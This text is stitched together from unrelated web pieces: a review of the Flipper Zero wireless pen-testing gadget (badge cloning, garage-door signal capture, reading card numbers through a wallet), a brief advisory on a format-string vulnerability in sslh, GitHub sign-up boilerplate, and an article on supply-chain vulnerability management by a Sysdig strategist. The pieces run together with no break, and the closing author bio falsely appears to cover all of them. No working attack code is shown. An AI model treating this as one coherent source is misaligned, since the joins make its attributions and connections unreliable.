The $200 device is called Flipper Zero, and it’s a portable pen-testing tool designed for hackers of all levels of technical expertise. The tool is smaller than a phone, easily concealable, and is stuffed with a range of radios and sensors that allow you to intercept and replay signals from keyless entry systems, Internet of Things sensors, garage doors, NFC cards, and virtually any other device that communicates wirelessly in short ranges. For example, in just seconds, I used the Flipper Zero to seamlessly clone the signal of an office RFID badge tucked safely inside my wallet.

If you had only heard about Flipper Zero through TikTok, where the tool has gone viral, you might think that it was a toy that could make ATMs spit out money, cars unlock themselves, and gas spill out of pumps for free. I spent the last week testing one to determine whether the world was as vulnerable to Flipper Zero as social media made it out to be. What I found was mixed: Many of the most dramatic videos posted to TikTok are likely staged—most modern wireless devices are not susceptible to simple replay attacks—but the Flipper Zero is still undeniably powerful, giving aspiring hackers and seasoned pen-testers a convenient new tool to probe the security of the world’s most ubiquitous wireless devices. 

In reviews, people liken Flipper Zero to a Swiss Army knife for physical penetration testing. But in my week testing Flipper Zero, it felt more like a blacklight—something I could literally hold up to a device that would reveal information, invisible to the human eye, about how it worked, what data it was emitting, and how often it was doing so. 

Here’s a brief list of some things I’ve learned with the help of Flipper Zero this week: Some animal microchips will tell you the body temperature of your pet. My neighbor’s car tire pressure sensor leaks data to anyone in range of the signal. My iPhone blasts my face with infrared signals every few seconds. My home security system has built-in signal-jamming detection. WIRED’s office bathroom has a soap dispenser that broadcasts whether it needs a refill.

When I told Alex Kulagin, one of Flipper Zero’s co-creators, about my experiences using his tool to make these kinds of mundane observations, he explained that this is exactly what the device is meant for. “We want to help you understand something deeply, explore how it works, and explore the wireless world that’s all around you but difficult to understand,” he says. 

Kulagin and his business partner, Pavel Zhovner, first came up with the idea for Flipper Zero in 2019. Since then, their company has sold 150,000 devices and they’ve grown their team to nearly 50 people. But as they’ve grown, they’ve encountered some resistance. This summer, payments of more than $1.3 million were held up by PayPal, and in September, US Customs and Border Patrol seized a shipment of devices. According to Kulagin, CBP released the shipment after a month but has yet to tell the company why it held the shipment. CBP declined WIRED’s request to comment about the seized Flipper Zeros.

Bob Zahreddine is a lieutenant for the Glendale Police Department and executive officer with the High Tech Crime Cops, an industry group made up of law enforcement officials that, according to its website, “connects cyber cops and investigators.” Zahreddine says that he isn’t necessarily surprised that CBP has taken an interest in Flipper Zero. “Because Flipper Zero is so customizable, the potential is there for it to be used in all sorts of crime,” he says. 

Zahreddine’s organization maintains a listserv where investigators will often solicit advice from their peers and share news or information about developments in the latest law enforcement technology. He told WIRED that while he hasn’t heard any chatter about Flipper Zero being used in any crimes on his listserv, investigators there are aware of the tool and have been following its development since Kulagin and Zhovner began fundraising on Kickstarter. 

Indeed, it’s easy to imagine how someone could break the law or even just get up to some petty mischief with this device. For instance, not only was I able to clone the ID badge of my office with Flipper Zero, I was able to record the signal that my neighbor’s garage door opener makes when he pulls into his driveway. Older cars that don’t use rolling code encryption are likely unlockable with the device, and my Flipper Zero was able to read my credit card number through my wallet and pants.

But Kulagin isn’t particularly concerned about his tool’s potential for criminal mischief. “Obviously, there are old cars that are vulnerable to Flipper. But they aren’t secure by definition—that is not Flipper’s fault,” he says. “There are bad people out there, and they can do bad stuff with any computer. We aren’t intending to break laws.”

To that end, Flipper Zero’s firmware, by default, prevents individuals from transmitting on frequencies that are banned in the country the device is in, and Flipper Zero’s Discord server explicitly forbids discussions about alternative firmware with illegal features. The tool also isn’t able to copy or replay any encrypted signals. For instance, while I was able to read the signal from my credit and debit cards, I was unable to use that signal to actually pay for anything with contactless payment systems. However, because the project is open source, a savvy Flipper user could adjust the firmware to enable additional, perhaps malicious, functionality.

When I asked Kulagin whether he had been contacted by law enforcement about the Flipper, he told me that he hadn’t. “No, not yet at least,” he says.

While it’s possible to get into trouble with a device like a Flipper Zero, the tool undeniably gives any curious person looking to learn about the devices around them a way to access and dissect the signals and protocols that power our lives. Personally, I am more engaged with the technology I encounter while walking around after my week with the Flipper Zero. I’m thinking more like a pen-tester.

What Is Flipper Zero? The Hacker Tool Going Viral on TikTok, Explained

A vulnerability, which was classified as critical, has been found in sslh. This issue affects the function hexdump of the file probe.c of the component Packet Dumping Handler. The manipulation of the argument msg_info leads to format string. The attack may be initiated remotely. The name of the patch is b19f8a6046b080e4c2e28354a58556bb26040c6f. It is recommended to apply a patch to fix this issue. The identifier VDB-216497 was assigned to this vulnerability.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-4639: fix possible format str vuln by utoni · Pull Request #353 · yrutschle/sslh

Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities.

The security industry collectively loses its mind when new vulnerabilities are discovered in software. OpenSSL is no exception, and two new vulnerabilities overwhelmed news feeds in late October and early November 2022. Discovery and disclosure are only the beginnings of this never-ending vulnerability cycle. Affected organizations are faced with remediation, which is especially painful for those on the front lines of IT. Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities, recognize impacts to supply chains, and secure their assets accordingly.

**Supply Chain Attacks Aren't Going Away**

In roughly a year's time, we've suffered through severe vulnerabilities in componentry including Log4j, Spring Framework, and OpenSSL. Exploitation of older vulnerabilities also never ceases from implementations that are misconfigured or that use known vulnerable dependencies. In November 2022, the public learned of an attack campaign against the Federal Civilian Executive Branch (FCEB), attributable to a state-sponsored Iranian threat. This US federal entity was running VMware Horizon infrastructure that contained the Log4Shell vulnerability, which served as the initial attack vector. FCEB was hit with a complex attack chain that included lateral movement, credential compromise, system compromise, network persistence, endpoint protection bypass, and cryptojacking.

Organizations may ask "why consume OSS at all?" after security incidents from vulnerable packages like OpenSSL or Log4j. Supply chain attacks continue trending upward because componentry reuse makes “good business sense” for partners and suppliers. We engineer systems by repurposing existing code rather than building from scratch. This is to reduce engineering effort, scale operationally, and deliver quickly. Open source software (OSS) is generally considered trustworthy by virtue of the public scrutiny it receives. However, software is ever-changing, and issues arise through coding mistakes or linked dependencies. New issues are also uncovered through evolution of testing and exploitation techniques.

**Tackling Supply Chain Vulnerabilities**

Organizations need appropriate tooling and process to secure modern designs. Traditional approaches such as vulnerability management or point-in-time assessments alone can't keep up. Regulations may still allow for these approaches, which perpetuates the divide between "secure" and "compliant." Most organizations aspire to obtain some level of DevOps maturity. "Continuous" and "automated" are common traits of DevOps practices. Security processes shouldn't differ. Security leaders must maintain focus throughout build, delivery, and runtime phases as part of their security strategy:

*   **Continuously scan in CI/CD:** Aim to secure build pipelines (i.e., shift-left) but acknowledge that you won't be able to scan all code and nested code. Success with shift-left approaches is limited by scanner efficacy, correlation of scanner output, automation of release decisions, and scanner completion within release windows. Tooling should help prioritize risk of findings. Not all findings are actionable, and vulnerabilities may not be exploitable in your architecture.

*   **Continuously scan during delivery:** Component compromise and environment drift happen. Applications, infrastructure, and workloads should be scanned while being delivered in case something was compromised in the digital supply chain when being sourced from registries or repositories and bootstrapped.

*   **Continuously scan in runtime:** Runtime security is the starting point of many security programs, and security monitoring underpins most cybersecurity efforts. You need mechanisms that can collect and correlate telemetry in all types of environments, though, including cloud, container, and Kubernetes environments. Insights gathered in runtime should feed back to earlier build and delivery stages. Identity and service interactions

*   **Prioritize vulnerabilities exposed in runtime:** All organizations struggle with having enough time and resources to scan and fix everything. Risk-based prioritization is fundamental to security program work. Internet exposure is just one factor. Another is vulnerability severity, and organizations often focus on high and critical severity issues since they're deemed to have the most impact. This approach can still waste cycles of engineering and security teams because they may be chasing vulnerabilities that never get loaded at runtime and that aren't exploitable. Use runtime intelligence to verify what packages actually get loaded in running applications and infrastructure to know the actual security risk to your organization.

We've created product-specific guidance to steer customers through the recent OpenSSL madness.

The latest OpenSSL vulnerability and Log4Shell remind us of the need for cybersecurity preparedness and effective security strategy. We must remember that CVE-IDs are just those known issues in public software or hardware. Many vulnerabilities go unreported, particularly weaknesses in homegrown code or environmental misconfigurations. Your cybersecurity strategy must account for distributed and diverse technology of modern designs. You need a modernized vulnerability management program that uses runtime insights to prioritize remediation work for engineering teams. You also need threat detection and response capabilities that correlate signals across environments to avoid surprises.

**About the Author**

    

Michael Isbitski, Director of Cybersecurity Strategy at Sysdig, has researched and advised on cybersecurity for over five years. He's versed in cloud security, container security, Kubernetes security, API security, security testing, mobile security, application protection, and secure continuous delivery. He's guided countless organizations globally in their security initiatives and supporting their business.

Prior to his research and advisory experience, Mike learned many hard lessons on the front lines of IT with over 20 years of practitioner and leadership experience focused on application security, vulnerability management, enterprise architecture, and systems engineering.

Tag

#ssl